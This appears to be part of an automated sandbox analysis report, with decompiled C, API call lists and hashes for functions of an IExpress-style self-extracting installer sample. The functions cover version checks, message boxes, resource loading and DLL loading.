						_t119 = 0;
						__eflags = 1;
						 *0x1258184 = 1;
						 *0x1258180 = 1;
						L13:
						 *0x1259a40 = _t119;
						L14:
						__eflags =  *0x1258a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E01252A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E01252A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x1258a38 & 0x00000001;
											if(( *0x1258a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("siga30");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0125681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "siga30", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E012567C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E012528E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x1259a40 = _t119;
						 *0x1258184 = 1;
						 *0x1258180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x1259a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x1258184 = _t135;
							 *0x1258180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E012544B9(0, _t138);
					L66:
					return E01256CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x012536f9
0x01253700
0x0125370c
0x01253716
0x01253718
0x0125371b
0x01253721
0x0125372b
0x0125373d
0x01253745
0x01253746
0x01253746
0x01253749
0x012537ab
0x012537ad
0x012537ae
0x012537b3
0x012537b8
0x012537b8
0x012537bf
0x012537bf
0x012537c5
0x00000000
0x00000000
0x012537cb
0x012537cd
0x00000000
0x00000000
0x012537d5
0x012537db
0x012537e8
0x012537ea
0x012537ea
0x012537ea
0x012537f0
0x012537f6
0x01253805
0x01253817
0x0125382b
0x01253830
0x01253836
0x0125383b
0x0125383d
0x012538eb
0x012538eb
0x012538f2
0x0125390c
0x01253911
0x01253911
0x01253913
0x0125394d
0x0125394d
0x0125394f
0x012538a9
0x012538a9
0x012538b0
0x012538b2
0x012538b9
0x012538bb
0x012538c1
0x01253975
0x012538c7
0x012538de
0x012538e0
0x012538e0
0x0125397b
0x0125397d
0x012539a9
0x0125397f
0x01253982
0x0125398b
0x0125398d
0x0125398f
0x0125399f
0x012539a1
0x01253991
0x01253991
0x01253991
0x0125398f
0x012539af
0x012539b6
0x01253a0f
0x01253a0f
0x01253a11
0x01253a13
0x01253a19
0x00000000
0x012539b8
0x012539b8
0x012539ba
0x00000000
0x00000000
0x012539bc
0x012539bf
0x00000000
0x00000000
0x012539c3
0x012539c9
0x012539ce
0x012539d0
0x012539e3
0x012539e5
0x012539e6
0x012539f1
0x012539f7
0x012539fa
0x01253a01
0x01253a04
0x00000000
0x00000000
0x01253a06
0x01253a09
0x01253a09
0x01253a0b
0x01253a0b
0x00000000
0x01253a09
0x012539fc
0x00000000
0x012539fc
0x012539d3
0x012539d8
0x012539da
0x00000000
0x00000000
0x00000000
0x012539dc
0x012539b6
0x01253955
0x0125395b
0x00000000
0x00000000
0x01253961
0x01253963
0x00000000
0x00000000
0x01253969
0x01253969
0x00000000
0x01253969
0x01253915
0x01253915
0x0125391b
0x0125391f
0x00000000
0x00000000
0x0125392d
0x01253933
0x01253938
0x0125393a
0x00000000
0x00000000
0x01253940
0x01253946
0x0125394b
0x00000000
0x0125394b
0x00000000
0x012538f2
0x01253843
0x01253845
0x00000000
0x00000000
0x0125384b
0x0125384d
0x01253883
0x01253885
0x00000000
0x00000000
0x0125389a
0x0125389e
0x0125389e
0x00000000
0x00000000
0x012538a0
0x012538a0
0x012538a2
0x00000000
0x00000000
0x012538a4
0x00000000
0x012538a4
0x0125384f
0x01253851
0x01253857
0x0125386e
0x01253877
0x0125387b
0x00000000
0x00000000
0x00000000
0x01253881
0x01253859
0x0125385c
0x01253862
0x01253866
0x00000000
0x00000000
0x01253868
0x00000000
0x012538f4
0x012538f4
0x012538f5
0x012538fb
0x01253901
0x01253901
0x00000000
0x0125390a
0x0125374b
0x0125374e
0x0125375c
0x01253764
0x01253769
0x0125376e
0x01253771
0x0125379c
0x0125379f
0x00000000
0x00000000
0x012537a3
0x012537a4
0x00000000
0x012537a4
0x01253773
0x01253777
0x01253778
0x0125377f
0x01253781
0x0125378e
0x0125378e
0x01253794
0x00000000
0x01253794
0x01253783
0x00000000
0x00000000
0x01253785
0x0125378c
0x00000000
0x00000000
0x00000000
0x0125378c
0x01253750
0x00000000
0x0125372d
0x0125372d
0x0125396b
0x0125396b
0x0125396c
0x0125396e
0x0125396f
0x01253a1e
0x01253a1e
0x01253a22
0x01253a27
0x01253a3e
0x01253a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 01253723
MessageBeep.USER32(00000000), ref: 012539C3
MessageBoxA.USER32(00000000,00000000,siga30,00000030), ref: 012539F1

Strings

3, xrefs: 01253785
siga30, xrefs: 012539E9, 01253A19

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$siga30
API String ID: 2519184315-1901119258
Opcode ID: c1ba21d3f5b632ad7511df2d36c2df6e34c32d72a6731661294ca8eb31cdbb46
Instruction ID: 41601de5b954f3b3c0969726a82cd84c47e52173752e512ec9551abca579a830
Opcode Fuzzy Hash: c1ba21d3f5b632ad7511df2d36c2df6e34c32d72a6731661294ca8eb31cdbb46
Instruction Fuzzy Hash: 7E9103B1E312269BEBB9CA29C8C57FA7BB0BB45394F0450A9DE49DB241D7708980CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01256495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E01256495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x1258004; // 0x958f311c
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E01251781( &_v268, 0x104, __ecx, "C:\Users\engineer\AppData\Local\Temp\IXP002.TMP\");
				_t26 = "advpack.dll";
				E0125658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E01256CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x01256495
0x01256495
0x012564a0
0x012564a7
0x012564ab
0x012564bd
0x012564c2
0x012564d3
0x012564df
0x012564e8
0x01256502
0x012564ee
0x012564f9
0x012564f9
0x01256516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 012564DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 012564F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 01256502

Strings

advpack.dll, xrefs: 012564C2, 012564CD, 01256501
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 012564AC

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
API String ID: 438848745-1900302821
Opcode ID: 5fcee92c86a06f0d4ad0a2ed375fc538d4b6f337f9ef674ed54138b73bf75fea
Instruction ID: f9adb693618c9d4fb7e5aa939cebd0ac5be1220d90780ea7d23aa351fdee52d8
Opcode Fuzzy Hash: 5fcee92c86a06f0d4ad0a2ed375fc538d4b6f337f9ef674ed54138b73bf75fea
Instruction Fuzzy Hash: 4501D630960208ABDBA0DB64ECC9BFE7778DB60324F900299E985931C4DFB09E858B50

Uniqueness

Uniqueness Score: -1.00%

Function 012528E8 Relevance: 7.6, APIs: 5, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012528E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E01252773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E01252A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E01252A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x012528f1
0x012528f4
0x012528f7
0x012528f9
0x012528fc
0x012528ff
0x01252901
0x01252907
0x01252a62
0x01252a64
0x0125290d
0x0125290d
0x0125290f
0x01252912
0x01252920
0x01252937
0x00000000
0x00000000
0x01252944
0x0125294a
0x0125294f
0x01252a2f
0x01252a32
0x01252a34
0x01252a37
0x01252a41
0x00000000
0x00000000
0x01252955
0x0125295e
0x01252962
0x01252969
0x0125296f
0x01252974
0x0125298c
0x01252a20
0x01252a21
0x01252a27
0x01252a4c
0x01252a4f
0x01252a50
0x01252a53
0x01252a56
0x01252a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x012529b2
0x012529b2
0x012529b5
0x012529bd
0x012529c3
0x012529cc
0x012529d5
0x012529d7
0x012529da
0x012529dd
0x012529df
0x012529ec
0x012529f8
0x012529fc
0x012529ff
0x01252a02
0x01252a07
0x01252a0a
0x01252a0f
0x01252a19
0x01252a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01252a0f
0x0125298c
0x01252974
0x01252962
0x00000000
0x0125294f
0x01252912
0x01252a65
0x01252a68
0x01252a6c
0x01252a6f
0x01252a6f
0x01252a7d

APIs

GlobalFree.KERNEL32 ref: 01252A6F

Part of subcall function 01252773: CharUpperA.USER32(958F311C,00000000,00000000,00000000), ref: 012527A8
Part of subcall function 01252773: CharNextA.USER32(0000054D), ref: 012527B5
Part of subcall function 01252773: CharNextA.USER32(00000000), ref: 012527BC
Part of subcall function 01252773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01252829
Part of subcall function 01252773: RegQueryValueExA.ADVAPI32(?,01251140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01252852
Part of subcall function 01252773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01252870
Part of subcall function 01252773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 012528A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,01253938,?,?,?,?,-00000005), ref: 01252958
GlobalLock.KERNEL32 ref: 01252969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,01253938,?,?,?,?,-00000005,?), ref: 01252A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 01252A81

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID:
API String ID: 3949799724-0
Opcode ID: 7974b0dad53455c5ed4e67b544dd9e04213f36a9afebf4bb8c59188d693109fb
Instruction ID: abba7de320adafbf334c0ba0c695d2d44cef287fc7bbd55deac8d4592d417345
Opcode Fuzzy Hash: 7974b0dad53455c5ed4e67b544dd9e04213f36a9afebf4bb8c59188d693109fb
Instruction Fuzzy Hash: D9512831E1021ADBDB61CF98D8C5AAEFBB5FF48710F14412AEA05E3391DB319941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01254169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E01254169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0125468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0125468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E012544B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E012544B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x0125417d
0x0125418f
0x01254193
0x012541b7
0x012541d3
0x012541e6
0x00000000
0x012541e7
0x012541d5
0x012541d6
0x012541d8
0x012541d9
0x012541da
0x012541df
0x012541e1
0x00000000
0x012541e1
0x012541b9
0x012541ba
0x012541bc
0x012541bd
0x012541be
0x00000000
0x012541be
0x00000000

APIs

Part of subcall function 0125468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 012546A0
Part of subcall function 0125468F: SizeofResource.KERNEL32(00000000,00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546A9
Part of subcall function 0125468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 012546C3
Part of subcall function 0125468F: LoadResource.KERNEL32(00000000,00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546CC
Part of subcall function 0125468F: LockResource.KERNEL32(00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546D3
Part of subcall function 0125468F: memcpy_s.MSVCRT ref: 012546E5
Part of subcall function 0125468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 012546EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,012530B4), ref: 01254189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,012530B4), ref: 012541E7

Part of subcall function 012544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01254518
Part of subcall function 012544B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 01254554

Strings

FINISHMSG, xrefs: 01254173, 012541AB
<None>, xrefs: 012541C5

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: 6194f9a378773dae4462fc8cb0288add2ec1b63fe0853e09a132f1ebe1379efe
Instruction ID: 8e4f7a10c1f543ca7c2149f2f0a84af630c4e698fb01151dcc337c0af8b1ead0
Opcode Fuzzy Hash: 6194f9a378773dae4462fc8cb0288add2ec1b63fe0853e09a132f1ebe1379efe
Instruction Fuzzy Hash: 950126B53202567FF3A436295CCAF7BB58DDBD46D4F008025BF01D2184E9B8CC504174

Uniqueness

Uniqueness Score: -1.00%

Function 01257155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01257155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x1258004; // 0x958f311c
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x1258004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x1258004 = _t39;
				}
				_t37 =  !_t36;
				 *0x1258008 = _t37;
				return _t37;
			}

0x0125715d
0x01257161
0x01257165
0x01257178
0x01257182
0x0125718e
0x01257197
0x012571a0
0x012571b1
0x012571b8
0x012571c4
0x012571c7
0x012571cb
0x012571d5
0x012571da
0x012571da
0x012571dc
0x012571dc
0x012571e2
0x012571e5
0x012571ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 01257182
GetCurrentProcessId.KERNEL32 ref: 01257191
GetCurrentThreadId.KERNEL32 ref: 0125719A
GetTickCount.KERNEL32 ref: 012571A3
QueryPerformanceCounter.KERNEL32(?), ref: 012571B8

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 2d470f66621065d904d6222c0ad03bb7b75723bcd83e3262ba029aee385c405d
Instruction ID: 1fec70656b7cfb07edf0dd1f18fd6697090591c57a9dd59f8e2f9816513dab64
Opcode Fuzzy Hash: 2d470f66621065d904d6222c0ad03bb7b75723bcd83e3262ba029aee385c405d
Instruction Fuzzy Hash: 29111C71D11308DFCB60DFB9E68DAAEBBF5EF48355FA18955D905E7204E6709A008B40

Uniqueness

Uniqueness Score: -1.00%

Function 012519E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E012519E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x1258004; // 0x958f311c
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E012543D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x1259a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E01256CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x012519e0
0x012519e0
0x012519eb
0x012519f2
0x012519f9
0x012519fc
0x01251a01
0x01251a2a
0x01251a2e
0x01251a3e
0x01251a4f
0x01251a62
0x01251a6a
0x00000000
0x01251a03
0x01251a06
0x01251a20
0x01251a20
0x01251a08
0x01251a08
0x01251a14
0x00000000
0x01251a16
0x01251a18
0x01251a70
0x01251a72
0x01251a72
0x01251a14
0x01251a06
0x01251a81

APIs

EndDialog.USER32(?,?), ref: 01251A18
GetDesktopWindow.USER32 ref: 01251A24
LoadStringA.USER32(?,?,00000200), ref: 01251A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 01251A62
MessageBeep.USER32(000000FF), ref: 01251A6A

Memory Dump Source

